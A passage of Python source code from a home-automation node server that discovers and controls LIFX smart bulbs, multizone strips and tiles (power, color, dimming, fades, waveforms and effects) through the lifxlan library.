address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
self.bulbs_found += 1
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update=self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update=self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, glabel), update=self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
try:
old_bulbs_found = int(self.getDriver('GV0'))
except:
old_bulbs_found = self.bulbs_found
else:
if self.bulbs_found != old_bulbs_found:
LOGGER.info(
'NOTICE: Bulb count {} is different, was {} previously'.format(self.bulbs_found, old_bulbs_found))
self.setDriver('GV0', self.bulbs_found)
LOGGER.info('Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color,
wf_period,
wf_cycles,
wf_duty_cycle,
WAVEFORM[
wf_form],
wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating all bulb to: {} duration: {}'.format(str(color), duration))
except TypeError:
duration = 0
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 1, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.connected = 1
self.uptime = 0
self.color = []
self.lastupdate = time.time()
self.duration = 0
self.ir_support = False
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
self.update()
self.long_update()
def query(self, command=None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
self.connected = 0
try:
self.color = list(self.device.get_color())
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
''' stop here as proceeding without self.color may cause exceptions '''
self.setDriver('GV5', self.connected)
return
else:
self.connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
self.connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
self.ir_support = self.device.supports_infrared()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV6', self.uptime)
if self.ir_support:
try:
ir_brightness = self.device.get_infrared()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = math.floor(10 * math.log10(self.device.get_wifi_signal_mw()) + 0.5)
except (lifxlan.WorkflowException, OSError, ValueError) as ex:
LOGGER.error(
'Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV0', wifi_signal)
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns / (1000000000.0 * 60 * 60)))
def _bri_to_percent(self, bri):
return float(round(bri * 100 / 65535, 4))
def _power_on_change(self):
if not self.controller.change_pon or self.power:
return
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val) * 65535 / 255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.controller.ignore_second_on:
LOGGER.info('{} is already On, ignoring DON'.format(self.name))
return
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
self._power_on_change()
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(
self.name, _cmd, str(ex)))
LOGGER.info(
'Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
self._power_on_change()
else:
LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info(
'Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self._power_on_change()
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.ir_support:
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color,
wf_period,
wf_cycles,
wf_duty_cycle,
WAVEFORM[
wf_form],
wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
self.effect = 0
def update(self):
self.connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
except (TypeError) as e:
LOGGER.debug('setDriver for color caught an error. color was : {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self._set_st()
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
except:
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val) * 65535 / 255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address,
COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else:
LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info(
'Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color,
self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else:
LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply=0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
def set_effect(self, command):
query = command.get('query')
effect_type = int(query.get('EF.uom25'))
if effect_type < 0 or effect_type > 1:
LOGGER.error('Invalid effect type requested')
return
''' 0 - No effect, 1 - Move '''
effect_speed = int(query.get('ES.uom42'))
''' needs effect duration in nanoseconds so multiply by 2*10^6 '''
effect_duration = int(query.get('ED.uom42')) * 1000000
parameters = [0, int(query.get('ER.uom2'))]
try:
self.device.set_multizone_effect(effect_type=effect_type, speed=effect_speed, duration=effect_duration,
parameters=parameters)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('set_effect error {}'.format(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf, 'EFFECT': set_effect
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Tile(Light):
"""
LiFX Light is a Parent Class
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.tile_count = 0
self.effect = 0
def start(self):
try:
self.tile_count = self.device.get_tile_count()
except Exception as ex:
LOGGER.error(f'Failed to get tile count for {self.name}: {ex}')
self.setDriver('GV8', self.tile_count)
super().start()
def update(self):
effect = None
try:
effect = self.device.get_tile_effect()
except Exception as ex:
LOGGER.error(f'Failed to get {self.name} effect {ex}')
if effect is not None:
if int(effect['type']) > 0:
self.effect = int(effect['type']) - 1
else:
self.effect = 0
self.setDriver('GV9', self.effect)
super().update()
def save_state(self, command):
mem_index = str(command.get('value'))
custom_data = deepcopy(self.controller.polyConfig['customData'])
try:
color_array = self.device.get_tilechain_colors()
except Exception as ex:
LOGGER.error(f'Failed to retrieve colors for {self.name}: {ex}')
return
''' Create structure for color storage'''
if 'saved_tile_colors' not in custom_data:
custom_data['saved_tile_colors'] = {}
if self.address not in custom_data['saved_tile_colors']:
custom_data['saved_tile_colors'][self.address] = {}
custom_data['saved_tile_colors'][self.address].update({mem_index: color_array})
self.controller.saveCustomData(custom_data)
def recall_state(self, command):
if self.effect > 0:
LOGGER.info(f'{self.name} is running effect, stopping effect before recall_state()')
try:
self.device.set_tile_effect(effect_type=0, speed=3000, duration=0, palette=[])
except Exception as ex:
LOGGER.error(f'Failed to stop {self.name} effect')
self.effect = 0
self.setDriver('GV9', self.effect)
mem_index = str(command.get('value'))
try:
color_array = self.controller.polyConfig['customData']['saved_tile_colors'][self.address][mem_index]
except Exception as ex:
LOGGER.error(f'Failed to retrieve saved tile colors {mem_index} for {self.name}: {ex}')
return
try:
self.device.set_tilechain_colors(color_array, self.duration)
except Exception as ex:
LOGGER.error(f'Failed to set tile colors for {self.name}: {ex}')
def set_tile_effect(self, command):
query = command.get('query')
effect_type = int(query.get('EF.uom25'))
if effect_type < 0 or effect_type > 2:
LOGGER.error('Invalid effect type requested')
return
self.setDriver('GV9', effect_type)
